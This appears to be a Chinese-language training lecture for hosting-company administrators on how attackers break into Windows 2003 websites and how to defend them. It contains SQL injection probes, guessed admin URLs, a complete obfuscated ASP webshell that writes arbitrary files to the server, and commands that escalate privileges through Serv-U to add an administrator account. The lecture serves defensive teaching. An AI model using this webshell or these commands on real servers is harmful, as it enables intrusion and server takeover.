今天这次是我们群的第一堂课,培训的内容包括网站安全,FTP安全,数据库安全,139或445端口安全,3389管理安全。
    针对WIN 2003的安全培训全部结束之后我们会推出针对LINUX的安全课程,然后还包括服务器的日常管理应该建立一个怎样的体系,怎么来规

 

范化管理,防止黑客利用管理员的管理不当来进行入侵,还包括对注册表安全分析,系统进程分析,系统服务分析,系统策略分析,系统日志分析,

权限分配体系的建立,到一些黑客程序的分析,包括一些WEB木马,网页病毒,数据库木马,应用程序木马,系统内核级木马,还有一些ARP欺骗,ARP

木马分析等,这些都会安排在我们培训课程当中,我们安排这些培训就是为了帮助各位IDC技术的朋友们做好你们服务器的安全管理,以保障客户

网站和服务器的安全稳定运行,提升你们公司对客户的服务品质。
    今天讲的内容是《网站入侵手段及如何保障网站安全》,我们大家都知道,现在90%以上的黑客对服务器的入侵都是通过80端口的WEB服务来

的,那为什么对于网站入侵的比率会这么高呢?SQL注入只是WEB入侵的一种方法,为什么对于网站入侵的比率会这么高呢?

    表面原因是网站存在各种各样的安全漏洞,实质的原因是什么呢?是网站应用的广泛,网站应用的普及势必会有更多的网站程序员被培养

出来,网站程序员一多起来之后,又没有一些良好的代码规划体系,所以很多存在各种各样漏洞的网站就被开发出来了,说的简单点就是做网

站的客户越来越多,一些企业需要网站,电子商务公司需要网站,视频公司需要网站,游戏公司需要网站,哪怕是一些个人站长也都会搞一些

网站,所以网站泛滥了,漏洞自然就多了。

    那网站有了漏洞,那大家知道黑客是怎么来利用这些网站来进行入侵的呢?工具软件是配合黑客来入侵的,我们要做好网站的防御工作,

就肯定要知道黑客都用了哪些技术手段,这样才好做好防御的工作,那现在我们就来跟大家分析一下黑客对网站的入侵手段。

    网站入侵手段当中黑客最常用的手段就是注入攻击,讲到注入攻击,很多以为就只是利用注入点列出数据库内容,然后通过后台上传

WEBSHELL,但实际上这只是黑客注入点入侵的一个很小的手段,今天我们就把这些黑客的各种注入点入侵手段都公之于众,注入攻击当中,最

初级的方法是ASP+ACCESS的注入入侵技术,ASP+ACCESS指的是ASP的网站,ACCESS的数据库,通常黑客对网站进行注入,会用一些手工的方法来

判断,比如在一些http://www.xxx.com/list.asp?id=1这样的网址后面加上一个单引号http://www.xxx.com/list.asp?id=1′
如果打开URL地址,发现返回错误信息之后,就八成是有注入漏洞了,为了进一步确认,黑客会用and 1=1和and 1=2的方式来判断
http://www.xxx.com/list.asp?id=1 and 1=1
http://www.xxx.com/list.asp?id=1 and 1=2
只要这两次打开URL地址的页面返回的结果不一样,那可以确定网站是存在注入漏洞了,黑客为了简便一些注入漏洞的判断,于是写了一些包括

明小子,阿D,NBSI等注入工具来辅助黑客判断,而且这些工具当中也都加入了更多入侵的功能了,这个是SQL注入的一种。

    黑客在拿到注入点之后,就会手工或者通过工具来列出数据库的内容,那我想很多人要问了,黑客列数据库的内容有什么用?能实现入侵

吗?作用其实还蛮大的,首先,很多网站都是有后台管理功能的
一般后台管理功能的账号和密码都存在数据库里面,所以黑客就要想办法列出数据库的账号和密码信息
,很多后台账号和密码是明文的,也有一部分是加密的,加密大部分都采取了MD5加密的方式,但是很多管理员设置得比较简单,用暴力破解法

就能破解出来,拿到这些信息之后,黑客就会想办法找到一些网站的后台的登录地址,很多网站后台的登录地址都比较容易猜
比如http://www.1.com/admin/admin.asp
http://www.1.com/admin/manage.asp
http://www.1.com/guanli/index.asp
等等,黑客工具当中的猜解后台登录地址的功能中都加入了这些可能被设置的URL地址,那黑客拿到后台登录地址之后,就可以很从容的输入账

号和密码登录进去了。

    那黑客登录网站后台又能有什么作用呢?不是还没达到入侵网站的目的吗?我们如果有管理网站的人应该知道,很多网站后台系统里面都

有一些上传图片,备份数据库的功能,正是这些功能给了黑客很多机会,黑客可以很轻松的利用上传图片的功能上传一个ASP木马程序,由于不

同网站程序都会有相应的木马,如ASP木马,ASP.NET木马,PHP木马,JSP木马,所以我们统称为WEB木马,最经典的是 海阳顶端木马,ASP木马

就是用ASP语言编写的网站管理程序,其实前些年,很多网站都会用ASP管理程序来管理网站,但后面有了FTP管理工具之后就很少有人用了,那

这样管理功能的网站程序就会黑客利用了,群共享里面有个hh.asp的文件,现在杀毒软件都会查杀ASP木马的,这个只是ASP木马当中最普通的

一个。
    在黑客技术当中,他们都把这种逃过杀毒软件查杀的技术叫“免杀”,黑客做免杀处理的方法有很多种,我再给大家看一种黑客对ASP木马

做的免杀处理的代码,大家看看这个文件

<%
hu=”伟””>p/<>b/<>tnof/<...你爱我声说你对再想多我:琳>’der’=roloc ‘4’=ezis tnof<>b<>’retnec’=ngila p<“” etirw.esnopseR 伟

“”>p/<>b/<>tnof/<……骗你被 边身你在呆会是还我,遍一择选再以可果如,全完不烧燃却念思的你对何为,前从段一那出漫弥,脸的你出漫弥

却雾烟但, 眠失而你想了为再不誓发, 烟根这完抽的狠狠,现出未从远永的你起想, 烟香色白根一燃点,边沿床的色蓝蔚在坐我剩只,间房进洒色

月帘窗吹风,见再说不是就歉抱句多好了说你, 天雨下个一那的手分起想,间之我你起想 点三晨凌>’der’=roloc ‘4’=ezis

tnof<>b<>’retnec’=ngila p<“” etirw.esnopseR 伟 “”>mrof/<“” etirw.esnopseR 伟 “”>存保=eulav timbus=epyt tupni<“”

etirw.esnopseR 伟 “”>aeratxet/<>23=htdiw 01=swor 08=sloc ataddfyc=eman aeratxet<“” etirw.esnopseR 伟 “”:容内的马入输””

etirw.esnopseR 伟 “”>rb<“” etirw.esnopseR 伟 ))””EMAN_TPIRCS””(selbairaVrevreS.tseuqeR(htappam.revres etirw.esnopseR 伟 “”径

路对绝件文本”” etirw.esnopseR 伟 “”>rb<“” etirW.esnopseR 伟 “”>05=ezis 23=htdiw htapdfys=eman txet=epyt tupni<“”

etirW.esnopseR 伟 “”>tnof/<:)psa.x\bew\:D如:名件文括包(径路对绝>der=roloc tnof<的件文存保”” etirw.esnopseR 伟 “”>tsop=dohtem

”=noitca mrof<“” etirw.esnopseR 伟 gnihtoN = OSFjbo teS 伟 gnihtoN=eliFtnuoCjbo teS 伟 esolC.eliFtnuoCjbo 伟 fi dne 伟

raelc.rre 伟 fi dne 伟 “”>tnof/<!sseccuSnU evaS>der=roloc tnof<“” etirw.esnopser 伟 esle 伟 “”>tnof/<!sseccuS evas>der=roloc

tnof<“” etirw.esnopser 伟 neht 0= rre fi 伟 atadf etirW.eliFtnuoCjbo 伟 )eurT,)””htapdfys””(tseuqer

(eliFtxeTetaerC.OSFjbo=eliFtnuoCjbo teS 伟 )””ataddfyc””(tseuqer = atadf 伟 neht “”””><))””htapdfys””(tseuqer(mirT fi 伟

)””tcejbOmetsySeliF.gnitpircS””(tcejbOetaerC.revreS = OSFjbo teS 伟 txen emuser rorre no 伟 eliFtnuoCjbo mid 伟 atadf mid 伟

OSFjbo mid伟”
execute(UnEncode(hu))
function UnEncode(cc)
for i = 1 to len(cc)
    if mid(cc,i,1)<> “伟” then
temp = Mid(cc,

i, 1) + temp
   else
    temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
%>

大家看看这段代码

<“” etirw.esnopseR 伟 “”>aeratxet/<>23=htdiw 01=swor 08=sloc ataddfyc=eman aeratxet<“” etirw.esnopseR 伟 “”:容内的马入输””

etirw.esnopseR 伟 “”>rb<“” etirw.esnopseR 伟 ))””EMAN_TPIRCS””(selbairaVrevreS.tseuqeR(htappam.revres etirw.esnopseR 伟 “”径

路对绝件文本”” etirw.esnopseR 伟 “”>rb<“” etirW.esnopseR 伟 “”>05=ezis 23=htdiw htapdfys=eman txet=epyt tupni<“”

etirW.esnopseR 伟 “”>tnof/<:)psa.x\bew\:D如:名件文括包(径路对绝>der=roloc tnof<的件文存保”” etirw.esnopseR 伟 “”>tsop=dohtem

”=noitca mrof<“” etirw.esnopseR 伟 gnihtoN = OSFjbo teS 伟 gnihtoN=eliFtnuoCjbo teS 伟 esolC.eliFtnuoCjbo 伟 fi dne 伟

raelc.rre 伟 fi dne 伟 “”>tnof/<!sseccuSnU evaS>der=roloc tnof<“” etirw.esnopser 伟 esle 伟 “”>tnof/<!sseccuS evas>der=roloc

tnof<“” etirw.esnopser 伟 neht 0= rre fi 伟 atadf etirW.eliFtnuoCjbo 伟 )eurT,)””htapdfys””(tseuqer

(eliFtxeTetaerC.OSFjbo=eliFtnuoCjbo teS 伟 )””ataddfyc””(tseuqer = atadf 伟 neht “”””><))””htapdfys””(tseuqer(mirT fi 伟

)””tcejbOmetsySeliF.gnitpircS””(tcejbOetaerC.revreS = OSFjbo teS 伟 txen emuser rorre no 伟 eliFtnuoCjbo mid 伟 atadf mid 伟

OSFjbo mid伟”

特别是这段,大家都看不懂了吧,大家可以反过来看这段代码,etirw.esnopseR就是response.write
这个变形马是把所有的代码都反过来写的,所以我们大家要清楚,黑客是异常狡猾的,他们会想尽各种各样的方法来避免杀毒软件的查杀和管

理员对他们的打击,当然,我们也非常欢迎大家查到一些各种最新的WEB木马之后给我们红盟提交过来,我们会把各种最新的WEB木马样本加入

到我们的安全软件当中去

    黑客上传了ASP木马之后,他们就有了普通users的权限了,我想大家也都看过了ASP木马的功能,它能够查看系统账号信息,系统各个目录

,系统注册表,系统服务,还有是否有运行CMD的权限等等,黑客在拿到这些权限之后,他可能会做两项工作,第一个就是把服务器里面所有的

网站都挂马,为什么要挂马呢?因为黑客正是因为想通过挂马来感染用户的电脑,把用户电脑里面一些银行账号和密码,QQ账号密码,网游的

账号密码等信息都窃取,包括一些朋友,你们在个人电脑里面放的一些艳照,也都要小心了,小心黑客像曝光陈冠希那样曝光你们的艳照 ^_^

    挂马是能赚很多钱的,所以这个工作黑客肯定会去做,黑客挂完马之后,下面要做的一项工作就是要提升他的权限,我们大家都知道win系统

权限有三层:guests,users和administrators,黑客只有提升到administrators权限才能远程登录到服务器里面,而且能完全控制服务器。
   提升权限的方法有很多种,servu这个ftp服务软件大家很多人都用过吧,servu 6.0版本的就存在几种漏洞,包括构造账号提升漏洞,本地

溢出漏洞,还有远程溢出漏洞,最新的servu 7还没发现明显的漏洞,servu提权有两种方式 :一种是配置文件可被修改的提权方法,如果配置

文件可以被修改的话,就可以直接在配置文件里面增加一个管理员权限的FTP账号。这样就可以通过FTP的方式登录进去,然后使用命令建立一

个系统账号

quote site exec
然后就可以通过3389远程登录进去

quote site exec net user ccc ccc /add

使用类似这样的命令
现在很多黑客的ASP木马当中都包含了能查看远程桌面端口的功能,因为在注册表里面都有3389端口的实际端口信息,所以黑客能很轻松就能知

道这些信息,那如果servu的配置文件不可修改,而servu的登录登录账号的密码是默认的,默认的是#l@$ak#.lk;0@P,所以黑客就可以利用这个本

地账号的密码来进行提权,这样黑客很容易都能提升成为管理员,黑客提权成功之后就可以控制系统的服务器了.

    下面我们再来跟大家讲讲注入的其它技术,现在很多网站都采用的是ASP/ASP.NET+SQL数据库的架构,SQL来做数据库的话,安全性就更要注

意,因为SQL是有很严重的安全漏洞,那我们现在就来讲讲黑客利用ASP+SQL网站的入侵方式,我们都知道SQL数据库里面也有三种权限,PUBLIC,

DBOWNER,SA三种,很多网站数据库默认给数据库权限的时候都会是SA,SA是SYSTEM ADMINISTRATOR,这可是最高的权限和系统的ADMINISTRATOR是

平级的,所以黑客能利用的机会就更大了,通常如果SQL数据库的网站如果有注入漏洞的话,那黑客就能获取到管理员的权限,大家可以看看群共享

里面的NBSI 2.5的这个黑客注入工具,这是一个对SQL数据库网站注入的最大的黑客利器,这个注入工具,不但可以查看数据库信息,还能提权,大

家看看软件的这个界面,nbcommander栏目中,大家看命令执行,黑客确定了注入点之后,就可以利用命令执行里面的功能来建立系统账号

在命令文本里面直接输入:net user ccc ccc /add
net localgroup administrators ccc /add
这样就可以直接建立一个系统管理员账号,这些都是黑客用的工具,所以杀毒软件是会查杀的,如果建立不了账号,那黑客还可以利用上传的功

能,传一些VBS木马之类的上去,然后用VBS木马来下载一些黑客工具,达到提升权限的目的,其实越高深的黑客,就能突破更大的安全防御措施,注

入的攻击技术是千变万化的,入侵,传木马,提权,控制系统,这些黑客技术都是入侵不同过程中都会用到,每一个过程都有N种黑客技术,所以理

论上黑客技术是有N+N+N+N种,各种之间根据实际情况都可以相互进行搭配,黑客入侵只要采取一种就行了,黑客根据服务器实际漏洞的情况会采

取不同的入侵手段.

    我们知道了黑客针对网站的这些入侵手段之后,那我们该怎么来防御呢?首先,先给服务器里面的网站加一些防注入代码,先探测一下哪些

网站有注入漏洞,然后加入防注入代码,第二,在网站后台的功能里面去掉上传的功能,不要使用备份数据库的功能,这样就可以避免黑客上传

ASP木马,然后系统本身打好补丁,按照先后顺序来打,避免配置造成的错误被黑客利用,然后把服务器里面的各类应用软件都升级,特别是SERVU升

级到最新的7.0版,各种端口该关闭的都关闭掉,只留下一些必须要用到的,然后3389端口这一块要做一些限制,在终端服务配置里面的连接打开
RDP-TCP属性的“权限”里面,除了system和administrator两个账号之外,其它权限都不要给,那就只有administrator有权限登录进来,刚才讲

的是手工的方式来防御,然后安全防御还要配合一些安全软件来

1、杀毒软件,卡巴斯基,麦咖啡之类的都不错

2、360,最大的用处就是更新升级

3、漏洞检测和监控软件

我们红盟自己开发了安全检测软件,就是检测各类黑客程序,木马,以及安全漏洞的工具,可以定期扫描一下,然后大家要明白,安全是一个动态

的概念,黑客的入侵技术层出不穷,随时随地都会有一些新的技术会出来,所以及时的做好服务器的更新,升级,加强防御措施是最好的安全防御

方式,好了,今天的课程讲完了 ,下次我们讲操作系统的安全攻防技术。